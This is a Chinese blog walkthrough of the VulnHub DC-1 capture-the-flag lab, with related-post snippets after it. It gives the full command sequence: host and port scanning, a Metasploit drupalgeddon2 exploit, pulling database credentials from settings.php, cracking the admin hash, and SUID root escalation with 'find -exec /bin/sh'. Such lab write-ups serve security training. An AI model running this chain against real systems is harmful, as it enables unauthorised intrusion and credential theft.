DC-1详解

于 2024-10-18 19:12:38 发布
阅读量836 收藏 12
点赞数 9
分类专栏: 渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Z1224403748/article/details/143060601
版权

目录

1. 将 kali 和 DC-1 放到同一网段(以 VMnet8 为例)

2. 查看 kali 的 ip 地址

3. 扫描网段,寻找 DC-1 的 ip 地址

4. 详细扫描端口信息

5. 查看网站

6. 漏洞扫描

7. 漏洞利用

8. shell

9. 网站登录

10. flag4

11. 提权

1. 将 kali 和 DC-1 放到同一网段(以 VMnet8 为例)

在高级里面检查 mac 地址

2. 查看 kali 的 ip 地址

3. 扫描网段,寻找 DC-1 的 ip 地址

方法一:

nmap -sP 192.168.100.0/24

方法二:

arp-scan 192.168.100.0/24

根据前面得到的 mac 地址可以确认 DC-1 的 ip 地址为 192.168.100.139

4. 详细扫描端口信息
nmap -A -p- -sS 192.168.100.139

端口信息如下

PORT

STATE

SERVICE

VERSION

22/tcp

open

ssh

OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)

80/tcp

open

http

Apache httpd 2.2.22 ((Debian))

111/tcp

open

rpcbind

2-4 (RPC #100000)

59105/tcp

open

status

1 (RPC #100024)

这里可以看到开放了 80 端口,所以可以尝试访问 DC-1 的网页

5. 查看网站

地址栏中直接访问 DC-1 的 ip 地址,即可跳转到该页面

Drupal 是一种开源的内容管理系统,所以下一步可以使用 msf 扫描可以利用的漏洞

6. 漏洞扫描
msfconsole
msf6 > search drupal

以如图所示漏洞为例

msf6 > use 1
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options
7. 漏洞利用

设置目标主机的 ip 地址

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.100.139
rhosts => 192.168.100.139

开始执行

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

成功之后会获取到一个 shell 值

8. shell

启动 shell,并用 python 美化一下交互框

meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"

ls 一下,发现里面有一个 flag1.txt 的文件,根据它的提示,应该再去找找 CMS 的配置文件

通过百度搜索得知,drupal 的配置文件为 settings.php,下一步搜索一下该配置文件

find ./ -name "settings.php"

可以看到该配置文件的路径,下一步访问该配置文件

cat ./sites/default/settings.php

这里发现一个名为 drupaldb 的数据库,以及用户名和密码,下一步尝试登录

mysql -u dbuser -p R0ck3t
mysql> show databases;

切换 drupaldb 表

mysql> use drupaldb;
mysql> show tables;

可以看到有一张 users 表,可能是存储的用户登录信息

mysql> select * from users;

这里可以看到有一条 admin 的用户名和密码,密码是经过 MD5 加密后的

使用在线工具进行解密,得到结果 53cr3t

9. 网站登录

使用 admin 账户登录,结果如下,成功登录

左上角有一个 Dashboard,点进来发现有一个 flag3

点进来结果如下,大致意思是说需要 find 提权

10. flag4

查看 /etc/passwd 文件,最下方有一条 flag4 的记录

尝试搜索 flag4 所在目录,发现有一个 flag4.txt 的文件

find / -name "flag4"
cd /home/flag4
ls
cat flag4.txt

这里大致意思是说需要 find 提权

11. 提权

suid 提权

find / -user root -perm -4000 -print 2>/dev/null

find / flag4.txt -exec "/bin/sh" \;

提权成功,可以看到是 root 用户,进入根目录下有 thefinalflag.txt 文件

cd /root
ls
cat thefinalflag.txt

至此,DC-1 完结

DC-1入门练习
Mr_helloword的博客
07-10 931
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1796
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
DC-1
per_se_veran_ce的博客
09-14 420
扫描局域网设备 发现目标 扫描基本信息 nmap -sV 扫描目标主机和端口上运行的软件的版本 -p 80 扫描指定端口 -p- 扫描全部端口 -A 综合扫描,太慢了,不推荐 -sS/sT/sW 指定TCP SYN/ACK/Windows -pN 跳过默认的发现检查并对执行目标的完整端口扫描 -PS 进行TCP SYN Ping -PA 进行TCP ACK Ping -n ...
VulnHub之DC-1
qq_45434762的博客
03-21 931
先进行一个粗糙的端口扫描首先我们对靶机所开放的端口进行扫描,发现有22,80,111端口开放Flag1既然开放了80端口,进去看看发现是Dupal CMS没有什么想法,现在MSF中搜一...
DC系列靶机DC-1
weixin_53067829的博客
07-01 1118
DC系列靶机
降压式DC-DC参数详解.pdf
04-09
DC-DC转换器是电子电路中常用的电源转换模块,其主要功能是将一个直流电压转换为另一个直流电压。根据转换方式的不同,可以分为降压型(Buck)、升压型(Boost)以及升降压型(Buck-Boost)等多种拓扑结构。本篇文档...
DC-DC变换电路详解
04-12
非常详细的介绍了升降压的过程,以及计算公式,常用的斩波电路等
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1541
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
DC-005规格书.pdf
03-06
DC-005规格书.pdf知识点详解 本文档为弘港科技电子有限公司的产品承认书,详细介绍了DC-005规格书的相关信息。 1. 产品承认书 产品承认书是供方和客户之间的协议,用于确定产品的规格、性能和测试条件。在本规格...
小H靶场学习笔记:DC-1
Hack_hui的博客
11-09 526
记录打DC-1靶场的过程及思路
DC-1详解(绝对的详细!)
学习!冲冲冲!
10-23 9484
DC-1靶机整个渗透过程(B站可以看小飞侠的视频真的好!) 将kali和DC-1的网络均设置为NAT模式 获取kali的IP地址 ifconfig 查看IP命令需要记住 扫描此IP段中存活的靶机IP arp-scan -l 根据靶机MAC地址来确认其IP地址 用masscan快速扫描DC-1开放的端口 masscan --rate10000 -p 1-65535 192.168.220.131 --rate10000 用来定义扫描速率 -p 1-65535 定义扫描从1-6553
DC-1靶场
2401_84693704的博客
09-25 1335
一、环境搭建:1. 靶机描述DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。您甚至不需要成为根用户来执行此操
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2675
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
DC-1实验解析
2401_84694245的博客
09-19 1247
​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限.​ SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。
DC-1 实验通关讲解
2401_83566267的博客
09-19 2054
DC实验讲解
[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-20 4819
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
DC-1靶场详解
苏生要努力
03-12 3164
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
DC-1复现及分析
最新发布
weixin_61982677的博客
10-08 1853
收集在某网段上存活的主机方式有很多种,常见的、易记忆的有arp-scan、nmap、netdiscover。攻击机和靶机的网络连接方式要相同,所以DC-1的网络连接方式采用NAT模式,与kali的网络连接模式相同。使用Drupal对数据库的加密方法,生成一个新密码,然后把新的密码更新到admin用户。根据题意,需要得知靶机DC-1的IP地址、IP地址开放的端口及网站的指纹信息。看到两个用户的密码被加密了,但可以修改密码或新增一个admin权限的用户。执行ls查看当前路径下的文件,可以看到flag1出现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值